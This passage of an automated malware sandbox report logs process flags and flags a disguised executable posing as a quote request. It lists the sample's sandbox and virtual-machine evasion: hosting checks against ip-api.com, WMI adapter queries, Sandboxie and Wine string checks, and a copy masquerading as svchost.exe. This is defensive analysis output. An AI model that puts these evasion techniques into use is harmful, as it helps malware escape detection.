                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe PID: 7520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7792, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8396, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000002.1664238561.000002091F69C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1993738956.000001A48033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000002.1664238561.000002091F69C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1993738956.000001A48033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeMemory allocated: 2091DAF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeMemory allocated: 20937660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1A4FE310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1A498000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 216F7350000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 216F8DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 10A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2AC0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29F0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: D30000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2960000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: E90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 28EF0550000 memory reserve | memory write watch
